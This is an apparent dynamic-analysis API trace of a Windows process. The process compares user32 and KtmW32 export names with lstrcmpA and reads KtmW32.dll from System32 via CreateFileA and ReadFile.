[0290.274] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0290.274] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0290.274] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0290.275] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0290.275] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0290.275] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0290.275] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0290.275] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0290.275] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0290.275] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0290.275] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0290.275] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0290.275] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0290.275] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0290.275] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0290.275] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0290.275] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0290.275] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0290.275] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0290.275] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0290.275] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0290.275] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0290.276] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0290.276] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0290.276] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0290.276] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0290.276] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0290.276] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0290.276] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0290.276] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0290.276] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0290.276] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0290.276] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0290.276] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0290.276] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0290.276] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0290.276] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0290.276] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0290.276] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0290.276] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0290.276] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0290.276] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0290.276] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0290.276] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0290.276] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0290.276] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0290.277] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0290.277] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0290.277] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0290.277] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0290.277] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0290.277] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0290.277] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0290.277] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0290.277] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0290.277] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0290.277] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0290.277] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0290.277] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0290.277] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0290.277] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0290.277] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0290.277] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0290.277] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0290.277] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0290.277] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0290.277] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0290.277] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0290.277] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0290.277] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0290.277] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0290.277] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0290.278] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0290.278] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0290.278] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0290.278] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0290.278] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0290.278] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0290.278] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0290.278] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0290.278] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0290.278] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0290.278] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0290.278] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0290.278] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0290.278] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0290.278] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0290.278] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0290.278] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0290.278] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0290.278] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0290.278] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0290.278] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0290.278] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0290.278] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0290.278] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0290.278] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0290.278] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0290.278] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0290.279] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0290.279] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0290.279] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0290.279] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0290.279] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0290.279] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0290.279] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0290.280] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0290.281] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0290.282] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0290.283] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0290.283] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0290.283] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0290.283] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0290.283] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0290.283] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0290.283] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0290.283] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0290.283] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0290.283] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0290.283] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0290.283] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0290.283] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0290.725] GetProcessHeap () returned 0x540000 [0290.726] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x4109040 | out: hHeap=0x540000) returned 1 [0290.734] GetProcessHeap () returned 0x540000 [0290.734] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x5590c0 [0290.734] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0290.739] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0290.739] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0290.739] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0290.739] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0290.739] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0290.739] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0290.739] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0290.740] GetProcessHeap () returned 0x540000 [0290.740] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5e00) returned 0x2d45030 [0290.740] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0290.740] ReadFile (in: hFile=0x17c, lpBuffer=0x2d45030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d45030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0290.741] CloseHandle (hObject=0x17c) returned 1 [0290.741] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0290.741] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0290.741] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0290.741] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0290.741] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0290.741] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0290.741] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0290.741] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0290.741] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0290.741] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0290.741] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0290.741] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0290.741] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0290.741] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0290.741] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0290.741] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0290.741] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0290.741] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0290.741] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0290.742] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0290.742] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0290.742] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0290.742] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0290.742] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0290.742] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0290.742] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0290.742] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0290.742] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0290.742] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0290.742] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0290.742] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0290.742] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0290.742] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0290.742] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0290.742] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0290.742] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0290.742] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0290.742] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0290.742] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0290.742] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0290.742] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0290.742] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0290.742] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0290.742] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0290.742] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0290.742] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0290.742] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0290.743] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0290.743] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0290.743] lstrcmpA 